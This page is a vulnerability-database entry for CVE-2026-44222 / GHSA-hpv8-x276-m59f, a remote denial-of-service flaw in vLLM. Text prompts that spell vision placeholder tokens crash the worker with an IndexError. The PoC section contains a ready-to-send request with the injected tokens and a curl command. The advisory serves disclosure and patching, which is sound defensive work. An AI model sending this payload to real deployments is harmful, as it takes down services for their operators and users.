Vulnerability-Lookup

GHSA-HPV8-X276-M59F

Vulnerability from github – Published: 2026-05-05 22:21 – Updated: 2026-05-13 16:27

Summary

vLLM Vulnerable to Remote DoS via Special-Token Placeholders

Details

Summary

This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

Details

Affected component: multimodal input position computation.
File/functions (paths are indicative):
vllm/model_executor/layers/rotary_embedding.py
- get_input_positions_tensor(...)
- _vl_get_input_positions_tensor(...)
Failure mechanism:
The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

vLLM: 0.10.0
Model: Qwen/Qwen2.5-VL-3B-Instruct
Launch server:

python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
In some deployments, the worker exits and capacity remains reduced until manual restart.

Impact

Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
Effect: Request → unhandled exception in position computation → worker termination / service unavailability.

Fixes

Changes associated with https://github.com/vllm-project/vllm/issues/32656

Credits

Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)

Severity

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.6.1"
            },
            {
              "fixed": "0.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44222"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-129"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T22:21:41Z",
    "nvd_published_at": "2026-05-12T20:16:43Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\nThis report explains a Token Injection vulnerability in vLLM\u2019s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.\n\n## Details\n- Affected component: multimodal input position computation.\n- File/functions (paths are indicative):\n  - vllm/model_executor/layers/rotary_embedding.py\n    - get_input_positions_tensor(...)\n    - _vl_get_input_positions_tensor(...)\n- Failure mechanism:\n  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.\n  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.\n\nRepresentative snippet (context):\n```python\n# vllm/model_executor/layers/rotary_embedding.py\n@classmethod\ndef _vl_get_input_positions_tensor(\n    cls,\n    input_tokens,\n    hf_config,\n    image_grid_thw,\n    video_grid_thw,\n    ...,\n):\n    # detect video tokens\n    video_nums = (vision_tokens == video_token_id).sum()\n    # later in processing\n    t, h, w = (\n        video_grid_thw[video_index][0],  # IndexError if no video data\n        video_grid_thw[video_index][1],\n        video_grid_thw[video_index][2],\n    )\n```\n\nAbbreviated call path:\n```\nOpenAI API request\n \u2192 vllm.v1.engine.core: step/execute_model\n \u2192 vllm.v1.worker.gpu_model_runner: _update_states/execute_model\n \u2192 vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor\n \u2192 _vl_get_input_positions_tensor\n \u2192 IndexError: list index out of range\n```\n\n## PoC\n### Environment\n- vLLM: 0.10.0\n- Model: Qwen/Qwen2.5-VL-3B-Instruct\n- Launch server:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n  --model Qwen/Qwen2.5-VL-3B-Instruct \\\n  --port 8000\n```\n\n### Request (text-only, no image/video data)\n```bash\ncat \u003e request.json \u003c\u003c\u0027JSON\u0027\n{\n  \"model\": \"Qwen/Qwen2.5-VL-3B-Instruct\",\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": [\n        { \"type\": \"text\",\n          \"text\": \"what\u0027s in picture \u003c|vision_start|\u003e\u003c|image_pad|\u003e\u003c|vision_end|\u003e\" }\n      ]\n    }\n  ]\n}\nJSON\n\ncurl -s http://127.0.0.1:8000/v1/chat/completions \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data @request.json\n```\n\n### Observed result\n- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).\n- In some deployments, the worker exits and capacity remains reduced until manual restart.\n\n## Impact\n- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.\n- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).\n- Effect: Request \u2192 unhandled exception in position computation \u2192 worker termination / service unavailability.\n\n## Fixes\n\n* Changes associated with https://github.com/vllm-project/vllm/issues/32656\n\n## Credits\nPengyu Ding (Infra Security, Ant Group)  \nZiteng Xu (Infra Security, Ant Group)",
  "id": "GHSA-hpv8-x276-m59f",
  "modified": "2026-05-13T16:27:48Z",
  "published": "2026-05-05T22:21:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44222"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/issues/32656"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM Vulnerable to Remote DoS via Special-Token Placeholders"
}

CVE-2026-44222 (GCVE-0-2026-44222)

Vulnerability from cvelistv5 – Published: 2026-05-12 19:57 – Updated: 2026-05-13 12:24

Title

vLLM: Remote DoS via Special-Token Placeholders

Summary

vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0.

Severity

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

SSVC

Exploitation: none Automatable: no Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-129 - Improper Validation of Array Index

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/vllm-project/vllm/security/adv…	x_refsource_CONFIRM
https://github.com/vllm-project/vllm/issues/32656	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
vllm-project	vllm	Affected: >= 0.6.1, < 0.20.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-44222",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-13T12:24:39.409933Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-13T12:24:53.560Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vllm",
          "vendor": "vllm-project",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.6.1, \u003c 0.20.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM\u2019s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-129",
              "description": "CWE-129: Improper Validation of Array Index",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-12T19:57:25.336Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f"
        },
        {
          "name": "https://github.com/vllm-project/vllm/issues/32656",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/issues/32656"
        }
      ],
      "source": {
        "advisory": "GHSA-hpv8-x276-m59f",
        "discovery": "UNKNOWN"
      },
      "title": "vLLM: Remote DoS via Special-Token Placeholders"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44222",
    "datePublished": "2026-05-12T19:57:25.336Z",
    "dateReserved": "2026-05-05T15:42:40.518Z",
    "dateUpdated": "2026-05-13T12:24:53.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-HPV8-X276-M59F

Summary

Details

PoC

Environment

Request (text-only, no image/video data)

Observed result

Impact

Fixes

Credits

CVE-2026-44222 (GCVE-0-2026-44222)

Tags

Sightings

Nomenclature